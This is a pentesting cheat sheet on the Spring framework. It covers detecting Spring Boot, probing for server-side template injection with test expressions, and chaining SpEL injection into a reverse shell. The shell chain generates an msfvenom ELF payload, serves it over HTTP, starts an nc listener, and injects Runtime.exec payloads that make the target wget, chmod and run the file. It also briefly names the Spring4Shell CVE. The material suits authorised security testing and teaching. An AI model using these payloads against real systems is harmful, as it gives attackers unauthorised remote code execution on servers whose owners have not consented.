Spring Pentesting
Last modified: 2023-01-23
Spring is an application framework and inversion of control container for the Java platform.
Detection
- If we get the Whitelabel Error Page, the website uses Spring Boot.
Reverse Shell with SSTI
SSTI Discovery
If there is an input form (such as a search form) or a URL parameter whose value is reflected in the page, it may be vulnerable to server-side template injection.
Try the following payloads:
2*2
#{2*2}
*{2*2}
Then confirm the injection with a string operation:
{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}
// ---------------------------------------
// expected output of the payloads above:
"xfx"
Reverse Shell
First, generate the reverse shell payload that the target will download from our web server.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf
Start a local web server so the target can download the payload named “r.elf”.
python3 -m http.server 8000
In another terminal, start a listener to catch the reverse shell.
nc -lvnp <local-port>
On the target website, inject the following payloads one after another:
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}
Finally, we should receive the shell on the listener.
Spring4Shell (CVE-2022-22965)
Spring4Shell is a remote code execution vulnerability in the Spring Framework. It affects a component in Spring Core, the heart of the framework.
It is identified as a bypass of the patch for CVE-2010-1622.
Exploits
Various exploits are available in GitHub repositories.